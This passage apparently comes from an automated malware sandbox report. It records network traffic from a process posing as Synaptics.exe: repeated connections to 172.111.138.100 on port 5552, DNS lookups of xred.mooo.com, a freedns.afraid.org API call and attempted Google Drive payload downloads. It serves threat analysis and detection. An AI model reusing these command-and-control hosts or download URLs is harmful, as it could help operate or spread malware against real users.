                                                                                                                            Dec 30, 2024 11:24:29.923088074 CET555249850172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.923147917 CET498505552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:29.937532902 CET498505552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:29.942368984 CET555249850172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.965831041 CET44349861142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.966021061 CET49861443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.966053963 CET44349861142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.966114044 CET49861443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.967113972 CET44349861142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.967171907 CET49861443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.967192888 CET44349861142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.967237949 CET49861443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.972094059 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.972188950 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:29.972888947 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:29.972965956 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:30.032128096 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:30.032188892 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:30.068969011 CET44349862172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:30.069009066 CET44349862172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:30.069037914 CET49862443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:30.069067955 CET44349862172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:30.069086075 CET49862443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:30.069122076 CET44349862172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:30.069161892 CET49862443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.651874065 CET49861443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.651913881 CET44349861142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.652095079 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.652122021 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.652827024 CET49862443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.652828932 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.652832985 CET44349862172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.652833939 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.653389931 CET49913443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.653450012 CET44349913142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.653542995 CET49913443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.656209946 CET49913443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.656209946 CET49914443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.656259060 CET44349913142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.656280041 CET44349914172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.656445980 CET49914443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.656610012 CET49914443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.656624079 CET44349914172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.658406973 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.658442020 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.658742905 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.659244061 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.659605026 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.707334995 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.945271969 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.945432901 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.945457935 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.945508957 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.946450949 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.946495056 CET44349867142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.946567059 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:35.981004953 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.981062889 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.981071949 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.981097937 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.981131077 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.981153011 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:35.981157064 CET44349868172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.981205940 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:36.257920027 CET44349913142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:36.258114100 CET49913443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:36.258474112 CET44349914172.217.23.97192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:36.258672953 CET49914443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:36.259087086 CET44349913142.250.186.46192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:36.259263992 CET49913443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:36.788486004 CET499235552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:36.793356895 CET555249923172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:36.793468952 CET499235552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:36.793998957 CET499235552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:36.798773050 CET555249923172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:38.155810118 CET4979680192.168.2.669.42.215.252
                                                                                                                            Dec 30, 2024 11:24:38.156053066 CET49867443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:38.156122923 CET49868443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:38.156179905 CET49914443192.168.2.6172.217.23.97
                                                                                                                            Dec 30, 2024 11:24:38.156264067 CET49913443192.168.2.6142.250.186.46
                                                                                                                            Dec 30, 2024 11:24:38.920269012 CET555249923172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:38.920341015 CET499235552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:38.996901035 CET499235552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:39.001790047 CET555249923172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:45.805478096 CET499795552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:45.810373068 CET555249979172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:45.810627937 CET499795552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:45.810967922 CET499795552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:45.815767050 CET555249979172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:47.951837063 CET555249979172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:47.952070951 CET499795552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:47.983803988 CET499795552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:47.988675117 CET555249979172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:54.835275888 CET500375552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:54.840241909 CET555250037172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:54.840327024 CET500375552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:54.840629101 CET500375552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:54.845438957 CET555250037172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:56.970671892 CET555250037172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:56.970777035 CET500375552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:57.133312941 CET500375552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:24:57.138293982 CET555250037172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:25:03.960974932 CET500395552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:25:03.965797901 CET555250039172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:25:03.965862036 CET500395552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:25:03.966257095 CET500395552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:25:03.971038103 CET555250039172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:25:18.107769966 CET555250039172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:25:18.162955999 CET500395552192.168.2.6172.111.138.100
                                                                                                                            Dec 30, 2024 11:25:55.779990911 CET555250039172.111.138.100192.168.2.6
                                                                                                                            Dec 30, 2024 11:25:55.834985018 CET500395552192.168.2.6172.111.138.100

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 30, 2024 11:24:22.393764973 CET5969053192.168.2.61.1.1.1
                                                                                                                            Dec 30, 2024 11:24:22.400484085 CET53596901.1.1.1192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:23.391835928 CET6539253192.168.2.61.1.1.1
                                                                                                                            Dec 30, 2024 11:24:23.399132013 CET53653921.1.1.1192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:23.402188063 CET5050153192.168.2.61.1.1.1
                                                                                                                            Dec 30, 2024 11:24:23.410257101 CET53505011.1.1.1192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:23.695738077 CET5595953192.168.2.61.1.1.1
                                                                                                                            Dec 30, 2024 11:24:23.702275038 CET53559591.1.1.1192.168.2.6
                                                                                                                            Dec 30, 2024 11:24:35.651874065 CET5083553192.168.2.61.1.1.1
                                                                                                                            Dec 30, 2024 11:24:35.659131050 CET53508351.1.1.1192.168.2.6

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 30, 2024 11:24:22.393764973 CET192.168.2.61.1.1.10xbf22Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:24:23.391835928 CET192.168.2.61.1.1.10xd780Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:24:23.402188063 CET192.168.2.61.1.1.10xa546Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:24:23.695738077 CET192.168.2.61.1.1.10x4a2fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:24:35.651874065 CET192.168.2.61.1.1.10xedeeStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 30, 2024 11:24:22.400484085 CET1.1.1.1192.168.2.60xbf22No error (0)docs.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:24:23.399132013 CET1.1.1.1192.168.2.60xd780Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:24:23.410257101 CET1.1.1.1192.168.2.60xa546No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:24:23.702275038 CET1.1.1.1192.168.2.60x4a2fNo error (0)drive.usercontent.google.com172.217.23.97A (IP address)IN (0x0001)false
                                                                                                                            Dec 30, 2024 11:24:35.659131050 CET1.1.1.1192.168.2.60xedeeName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • docs.google.com
                                                                                                                            • drive.usercontent.google.com
                                                                                                                            • freedns.afraid.org

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.64979669.42.215.252805048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 30, 2024 11:24:23.417119026 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                            User-Agent: MyApp
                                                                                                                            Host: freedns.afraid.org
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Dec 30, 2024 11:24:24.009567022 CET243INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:23 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: keep-alive
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Cache: MISS
                                                                                                                            Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.649785142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:23 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-hPMgVM7RZXbm4JkLuaTCZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.649786142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:23 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-SZqa8rDhK-i0slRwkfdTcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.649802142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:24 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-oP-q_joa3P3klhU7BN2vMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.649805172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:24 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-30 10:24:24 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC4KlaZQ4n-XKMdW1aWpbAFMRpXtf-mXTavBuLeS7kh3Xpl8Tu7eBCs4dvenupWm320k
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:24 GMT
                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Zlj0acJSHkIHNfrDRTNwgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Set-Cookie: NID=520=BYMo-wv4eYJdWmry7AUwgnY8FD94uo3veWkAXjfZOk1mv7TJVBgEhqFHCgX6R2JeKOBvo50nIjRpzf2b_9A2GW8ksEyt-5g4q85Ob8tsU_aR9mcINLgHh64rG-oKyQGbjBH7KUvXgliKdHc4uXAnoj7xbO6TIXqQNfde8w3K2uPd4t-_pCWMMPI; expires=Tue, 01-Jul-2025 10:24:24 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:24 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 52 55 5a 30 70 30 69 54 5f 39 44 64 6d 42 70 37 71 6e 72 34 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LRUZ0p0iT_9DdmBp7qnr4Q">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                            2024-12-30 10:24:24 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.649804172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:24 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-30 10:24:24 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC7NffQA0sK6LlEYaFFQ7Ze0jEZ5-g3-HNlxD8dVcfnhVBVgP_ShdHb7zvTRGAe23PV3b7oa4L0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:24 GMT
                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-WqdjAfbOEyvViiWfNKNokA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Set-Cookie: NID=520=Y_PNLw8RAdUj4J1fOerPMq8Ej9LvL1f7eF6_piOgXJNptBE8qxvPOkddsBqHD9gQOeCrJToQuet-_tokPg-JdZJiqyAu88gCyYeyuE48kpaD4y1_QnonBLTPPkt56ERiisqn6OfLmXRqnXEdx-shuyT3q60FEk5q_r3UTpHE8-DK_GE5EajAs4Vr; expires=Tue, 01-Jul-2025 10:24:24 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
